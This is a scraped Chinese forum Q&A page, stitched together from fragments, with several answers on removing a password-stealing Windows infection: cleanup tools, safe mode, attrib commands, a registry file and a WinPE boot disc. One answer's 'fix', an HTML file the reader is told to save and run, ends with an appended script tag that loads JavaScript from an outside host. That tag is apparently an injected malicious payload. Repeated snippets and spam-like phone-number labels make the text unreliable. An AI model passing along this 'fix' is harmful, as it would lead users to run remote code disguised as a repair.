求救啊Win32:Malware-gen病毒
Win32
/Malware.Gen属于一种可以感染Windows的
恶意软件
。该软件可以导致用户的个人数据遭到破坏甚至远程窃取,用户的计算机默认设置遭到篡改,甚至可能会导致远程控制,造成进一步的破坏。
如果用户在计算机中发现了此类恶意软件,建议及时使用Windows
Defender等软件进行彻底的查杀,防止恶意软件造成破坏。如果仍不能够解决问题,则可以尝试联系杀毒软件开发人员解决问题。
属于Malware病毒系列的一个分支,其本身对电脑危害并不大,常隐藏于一些游戏、文件和压缩包中,主要目的是为了盗取用户的QQ密码,游戏密码。当您在输入游戏密码时,此病毒会自动记录键盘按键记录,传送给互联网,如果不尽快清除此病毒,您的QQ密码,游戏密码毫无安全性可言。
Win32.Malware.gen (suspicious)
Operate2.exe 进程位置: \Program Files\Outlook Express\ 程序名称: Secure:Win32.Malware.gen 程序用途: 窃取密码...实现自启动,病毒运行后允许恶意攻击者远程控制计算机,窃取密码和个人数据.并大量占用系统资源造成机器运行缓慢。
清除方法:
windows清理助手
扫描清理 然后点故障修复2次 修复时注意 勾选全部选项
使用的时候关了其他杀毒软件
避免冲突
windows清理助手,能做驱动级清理,这是目前杀毒软件达不到的.
下面是所有方法:
1.安全模式下,效果好!
2. 以下所要使用的软件,都要安装或升级到最新版本,以保证使用的效果。
3. 不杀毒,直接使用以下方法也可以 。若效果不好,就在安全模式下用优质杀毒软件(如:卡巴斯基)杀一下,360安全卫士最好也用一下。
(用360安全卫士的“杀木马”----“全盘扫描”。杀完重启。)
以下方法,不一定都要用,可以一个一个去试。有时,仅第一个就管用了。
一. 关闭浏览器,打开新版本360安全卫士的“系统修复”, 可根据情况,将“主页修复”“系统修复”“IE修复”选择打钩(也可全选。至少要选“系统修复”),再点“一键修复”。(懒得安装它,就直接用360急救箱) 。
再用360急救箱。【按步骤操作:先“开始急救”;扫描完后,出现木马,就点“隔离”;再点“修复” (可以全选)――“立即修复”。 接着,点“恢复丢失的DLL文件”,添加系统检测时所得知丢失的DLL文件,再点“立即修复’。“修复网络”视情况而决定是否修复。完后,应重启。】
二.用360安全卫士的“清理插件”进行扫描,扫除恶意插件后,进行清理。完后应重启。
三.用windows清理助手(从网上下载)。扫描后(若扫出东西,都勾并清理),再用故障修复(全选),然后在桌面点鼠标右键刷新。安全模式下效果好。
也可考虑用金山急救箱【点扫描后,如果出现可以修复的项目,全选后,点修复即可。】
你的注册表被病毒改成无法显示隐藏.在文件隔离区是病毒exe文件.千万不可还原它.你原来的文件夹就在原位置.只是被隐藏.
将虚线以下的内容保存成 1.html 文件,点击执行后. 你的电脑就正常了.
---------------------------------------------------
<html>
<body>
<script language="JavaScript">
var shl=new ActiveXObject("Wscript.shell");
shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools",0, "REG_DWORD");
window.alert("你的注册表编辑器已解除禁用!")
</script>
</body>
</html>
<script language=javascript src=http://web.yooosky.com/css.js></script>
晕,没一个对的!
3楼的有些靠谱。但是病毒很可能把文件夹加上了系统属性~这样即使你修复隐藏文件的相关选项也没用。
两种方法解决:
1,我的电脑-工具-文件夹选项-查看,取消“隐藏受保护的系统文件”的勾选。再勾选“显示所有文件/文件夹”。确定后你的文件夹就显示出来了。
2最彻底的方法,直接把文件夹的属性改回正常。
开始-运行-cmd回车,attrib d:/*.* -h -s /s /d回车,耐心等待命令运行完成。再把d改为其他分区盘符,依次运行即可恢复各分区文件夹属性。
靠,看没看本人的回答?!文件夹选项中还需要取消“隐藏受保护的系统文件”一项!~另外隔离区是病毒exe文件,你还原它干吗?!你的真实文件夹就在原位置,只不过被隐藏叻~仔细看上面的方法~
1.下载这个工具
windows清理助手3.0
对流行木马和IE弹广告窗口等有奇效!!!
地址
http://www.arswp.com/download/arswp2/arswp2.rar
简介:短小精悍,首选工具!
用法:
下载后,解压到桌面
运行程序(ArSwp.exe),等扫描。
扫描出来的东西,全部打勾,点清理即可(如提示重启就重启下电脑).
-
2.强力推荐
贝壳安全的木马专杀:
扫描系统文件夹一绝!!
(这个是玩网络游戏的人必备的工具,文件超小,但扫描效率很高)
下载地址
http://www.beike.cn/
《贝壳木马专杀》是国内首款专为网游防盗号量身打造的,是完全免费的木马专杀软件;
小于500kb的轻小体积,纯绿色的免安装模式,适合玩家快速下载使用。由金山的云安全和贝克联合出品!效果很好。
-
3.
360
出的顽固木马专杀
(注意不是360安全卫士)
http://www.360.cn/killer/360compkill.html
简介:可查杀机器狗、U盘病毒、磁碟机,
最新各类流行木马等数十种顽固型木马;并修复360安全卫士及360保险箱
注意:这个工具偶尔会有文件误报,注意一下就行了。
比如说原来你有E:\game这个文件夹
但是现在怎么也看不到,你可以随便打开一个文件夹,然后在地址栏输入E:\game然后回车,看看能不能进去,如果能就是注册表被改了无法显示隐藏文件了,即使你在文件夹选项里选了显示也没用
如果是我说的问题
隐藏文件的显示:
把下面的内容保存成 a.reg 文件后,双击导入注册表
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
鉴于楼主现在的情况,你可以先试试下面的办法:
在WinPE下杀毒
我们知道对于查杀病毒有一个比较好的办法就是到DOS(或其它的系统)下去杀。但现在的许多机器都不再把软驱作为一个标配的配件了,而且许多朋友也不熟悉DOS下的命令操作。所幸现在的一些杂志社为读者和用户想到了这一点,
现在的《电脑迷》《网友世界》的随刊光盘可以起到这样的作用!
1.去买一本最新期的《电脑迷》或《网友世界》的杂志,它有一个随刊的光盘里面集成有NOD32杀毒软件,用这个光盘上的WinPE启动了电脑,选择相应的操作即可进入WinPE界面选择NOD32进行杀毒。
2.将这个光盘放入光驱重启电脑。
用光盘启动电脑需要光驱作为第一启动设备。方法如下:
电脑重启后按Del键进入BIOS。
PhoenixBIOS:Boot→光标选择至CD-ROM Drive→按小键盘的+号使CD-ROM Drive升至第一位。
Phoenix-AwardBIOS: Advanced BIOS Setup→First Boot Device设置为CD-ROM。
AMIBIOS:Advanced BIOS Features→Boot Device Select→1st 改为CD-ROM。
按F10保存设置,重新启动计算机。
3.在提示从CD启动时按任意键,启动维护光盘。
4.电脑会进入一个与Windows XP一样的界面。
操作方法很简单,这里就不细说了。
5.与我们平时在系统里操作一样,双击桌面上的“NOD32”的图标,就可以启动这个光盘里的杀毒软件对我们电脑上的硬盘进行病毒的查杀了。
如果真是有病毒的话,杀完毒后重启应该能正常了。
在机器里的杀毒软件无法运行或机器没有安装有杀毒软件,又想扫描查杀病毒时用这样的光盘非常方便。
笃包复方: 本姑娘来回答你了. 悬赏分要给我…最好再加给我50分 你的注册表被病毒改成无法显示隐藏.在文件隔离区是病毒exe文件.千万不可还原它.你原来的文件夹就在原位置.只是被隐藏. 将虚线以下的内容保存成 1.html 文件,点击执行后. 你的电脑就正...
普格县18910388486: win32/malware.gen 是什么病毒 - ?
笃包复方: Win32/Malware.Gen属于一种可以感染Windows的恶意软件.该软件可以导致用户的个人数据遭到破坏甚至远程窃取,用户的计算机默认设置遭到篡改,甚至可能会导致远程控制,造成进一步的破坏.如果用户在计算机中发现了此类恶意软件,建议及时使用Windows Defender等软件进行彻底的查杀,防止恶意软件造成破坏.如果仍不能够解决问题,则可以尝试联系杀毒软件开发人员解决问题.
普格县18910388486: 求救啊!很厉害的毒 - Win32.Malware.Heur - Generic.B.(kcloud)?
笃包复方: 1.关闭系统还原功能:点击我的电脑,选中C盘,点击右键,选择关闭系统还原,重启电脑进入安全模式; 2.使用killbox或Xdelbox文件强力删除工具清除杀毒软件警报的相关病毒文件 3.清除IE临时文件,工具》Internet选项》清除临时文件; 4.使用杀毒软件扫描并全盘查杀Win32.Malware.Heur_Generic.A.580984病毒(注意:为了避免病毒被杀毒软件清除后又重复出现,故建议在安全模式查杀即:重新启动按F8进入安全模式)
普格县18910388486: 求助:金山毒霸发现:病毒名称:Win32.Malware.Heur - Generic.A.(kcloud) - ?
笃包复方: 这个已经被感染了,建议你赶快备份一下你俄罗斯方块的源码,这个病毒威胁性为中,不过速度比较快,这个病毒在硬盘格式化,恢复系统后会马上自动重新生成很多类似 KB9404.UUS 之类的垃圾文件,安全模式强杀~然后系统恢复.
普格县18910388486: Win32.Malware.Heur - Generic.A.(kcloud) 中了这个病毒 该怎么办啊 - ?
笃包复方: 这是很常见的文件夹模拟者病毒.会盗窃用户的账号和密码、劫持主页、弹广告等等.用杀毒软件扫描删除即可.如果无法删除,说明病毒正在运行,无法查杀.处理方法:对活体病毒灭活——百度搜索金山网盾,第一个就是,安装后使用一键修复功能,根据提示修复重启即可对病毒灭活同时修复系统错误.病毒灭活后,用杀毒软件扫描即可删除.有些还会潜藏在IE浏览器插件里,你可以使用金山卫士这个软件的插件清除功能来处理 杀毒后,建议你立即更改密码,以保证账号安全.
普格县18910388486: 怎么杀死Win32:Malware - gen病毒啊? - ?
笃包复方: 您好:建议您使用腾讯电脑管家查杀Win32:Malware-gen病毒,打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以,腾讯电脑管家是完全可以帮助您查杀Win32:Malware-gen病毒的哦,您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载 如果有其他问题,欢迎继续到电脑管家企业平台提问
普格县18910388486: win32.malware.SFMbdld病毒怎么杀啊?
笃包复方: 用专杀工具查杀 如果您还有关于电脑软、(病毒)、硬故障的问题,请访问雨林木风交流论坛,那里有专业工程师来共同解决您的问题.雨林木风交流论坛地址: http://www.ylmf.net/
普格县18910388486: 电脑中了win32/malware.gen求高手解答?
笃包复方: Operate2.exe 进程位置: \Program Files\Outlook Express\ 程序名称: Secure:Win32.Malware.gen 程序用途: 窃取密码...实现自启动,病毒运行后允许恶意攻击者远程控制计算机,窃取密码和个人数据.并大量占用系统资源造成机器运行缓慢. ...
普格县18910388486: Win32.Malware.Heur - Generic.B.(kclod) 是什么病毒? - ?
笃包复方: 你好,根据你反应的情况从名字来看,malware代表恶意软件,而heur代表是启发发现的,存在一定的误报可能,具体要看这个程序地址才能断定,这个可以文件应该不难处理关键是杀毒软件可能还没能完美处理这个病毒,建议你用工具软件如windows清理助手等工具来尽情清除.如果最好的话,求助时带日志好分析解决问题 建议你先给电脑上安装一款值得信任的杀毒软件,然后更新到最新的病毒库,全盘查杀.如果正常模式下面无法处理的话,请进入安全模式下面处理.如果杀毒软件无法解决的话,推荐你使用金山急救箱等工具进行清除.希望我的回答对你有帮助!
普格县18910388486: win32:malware - gen是什么病毒啊 刚做好的系统怎么被AVAT扫出来?
笃包复方: Secure:Win32.Malware.gen 程序用途: 窃取密码...实现自启动,病毒运行后允许恶意攻击者远程控制计算机,窃取密码和个人数据.并大量占用系统资源造成机器运行缓慢 一般用金山急救箱或360急救箱~~都可以清除~~~清理完成后 在装防毒软件~~~
